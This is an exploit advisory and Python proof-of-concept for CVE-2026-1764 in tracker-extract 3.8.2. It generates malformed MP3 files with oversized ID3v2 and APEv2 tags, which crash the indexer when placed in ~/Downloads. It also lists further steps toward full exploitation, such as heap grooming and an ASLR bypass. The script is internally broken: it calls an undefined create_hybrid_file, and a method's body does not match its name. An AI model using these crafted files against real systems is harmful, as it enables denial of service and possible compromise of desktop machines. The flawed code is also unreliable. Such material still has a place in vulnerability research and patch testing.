============================================================================================================================================= | # Title : tracker-extract 3.8.2 tracker-miners 3.x Media Parser Crash PoC | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://www.ubuntu.com/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/215100/ & CVE-2026-1764 [+] Summary : Crafted MP3/APEv2 tags may cause tracker-extract to crash when parsing oversized or malformed frames. [+]PoC : id3_overflow.mp3, ape_overflow.mp3, hybrid.mp3 Place file in ~/Downloads tracker-miners auto-indexes file Observe crash with: journalctl -f | grep tracker #!/usr/bin/env python3 import struct import sys import os class MP3ExploitGenerator: def __init__(self): self.techniques = [] def create_id3v2_size_overflow(self, filename): """ Create ID3v2 tag with size that causes integer overflow in tracker-miners' allocation routine """ with open(filename, 'wb') as f: f.write(b'ID3') f.write(b'\x03\x00') f.write(b'\x00') size = 0x1FFFFFFF sync_safe = bytes([ (size >> 21) & 0x7F, (size >> 14) & 0x7F, (size >> 7) & 0x7F, size & 0x7F ]) f.write(sync_safe) f.write(b'TIT2') frame_size = 0x3FFFFFFF f.write(struct.pack('>I', frame_size)) f.write(b'\x00\x00') f.write(b'A' * 1024) self.techniques.append("ID3v2 size overflow (premature EOF)") return True def create_mp3_bitrate_confusion(self, filename): """ Create MP3 with conflicting bitrate/sample rate information """ with open(filename, 'wb') as f: header = 0xFFFB # MPEG-1 Layer 3 header = (header & ~(0xF << 12)) | (0xF << 12) header = (header & ~(0x3 << 10)) | (0x3 << 10) f.write(struct.pack('>H', header)) bitrate_lookup = [0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 0] sample_rate_lookup = [44100, 48000, 32000, 0] bitrate_idx = 15 sample_rate_idx = 3 f.write(b'Xing') f.write(struct.pack('>I', 0x0000000F)) f.write(struct.pack('>I', 0xFFFFFFFF)) f.write(struct.pack('>I', 0xFFFFFFFF)) self.techniques.append("MP3 bitrate/sample rate confusion") return True def create_apev2_item_overflow(self, filename): """ APEv2 tag with item_count * item_size overflow """ with open(filename, 'wb') as f: f.write(b'\xFF\xFB\x90\x64\x00\x00\x00\x00') f.write(b'\x00' * 4000) f.write(b'APETAGEX') f.write(struct.pack('I', 100)) f.write(b'\x80\x00') for i in range(5): header = 0xFFFB bitrate_idx = (i % 14) + 1 header = (header & ~(0xF << 12)) | (bitrate_idx << 12) f.write(struct.pack('>H', header)) f.write(b'\x00' * 400) f.write(b'TAG') f.write(b'A' * 125) f.write(b'\x00' * 1) self.techniques.append("Hybrid ID3v2/MP3/ID3v1 confusion") return True def test_with_tracker(filename): """Simulate how tracker-miners would process the file""" print(f"\n[+] Simulating tracker-miners parsing of {filename}") print(" (Based on tracker-extract 3.8.2 source analysis)") file_size = os.path.getsize(filename) print(f" File size: {file_size:,} bytes") with open(filename, 'rb') as f: header = f.read(10) if header.startswith(b'ID3'): print(" Starts with ID3v2 tag") version = header[3] print(f" ID3v2.{version}.0 detected") size_bytes = header[6:10] size = 0 for b in size_bytes: size = (size << 7) | (b & 0x7F) print(f" Tag size field: {size:,} bytes") if size > 100 * 1024 * 1024: # 100MB print(" Large size field - potential overflow") elif header[:2] == b'\xFF\xFB' or header[:2] == b'\xFF\xFA': print(" MPEG audio frame detected") f.seek(-32, os.SEEK_END) footer = f.read(32) if b'APETAGEX' in footer: print(" APEv2 tag detected at end") def main(): if len(sys.argv) < 2: print("Usage: python3 tracker_exploit.py ") sys.exit(1) test_dir = sys.argv[1] os.makedirs(test_dir, exist_ok=True) generator = MP3ExploitGenerator() files = [ ("id3_overflow.mp3", generator.create_id3v2_size_overflow), ("bitrate_confusion.mp3", generator.create_mp3_bitrate_confusion), ("ape_overflow.mp3", generator.create_apev2_item_overflow), ("hybrid.mp3", generator.create_hybrid_file), ] for filename, create_func in files: filepath = os.path.join(test_dir, filename) print(f"\n[+] Creating {filename}...") if create_func(filepath): test_with_tracker(filepath) print("\n" + "="*60) print("VULNERABILITY SUMMARY") print("="*60) for i, technique in enumerate(generator.techniques, 1): print(f"{i}. {technique}") print("\n" + "="*60) print("REAL EXPLOIT CONSIDERATIONS") print("="*60) print(""" 1. Heap Feng Shui needed for reliable exploitation 2. GLib memory allocator (g_slice, g_malloc) specifics 3. tracker-miners uses GStreamer for parsing - check those code paths 4. ASLR bypass via info leaks (if any) 5. Need to control specific function pointers (GObject methods) 6. Potential sandbox/Seccomp restrictions """) print("\n[+] Test files created in:", test_dir) print("[!] For actual exploitation, reverse engineer:") print(" - tracker-extract binary") print(" - libtracker-extract.so") print(" - GStreamer plugins used") if __name__ == "__main__": main() Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================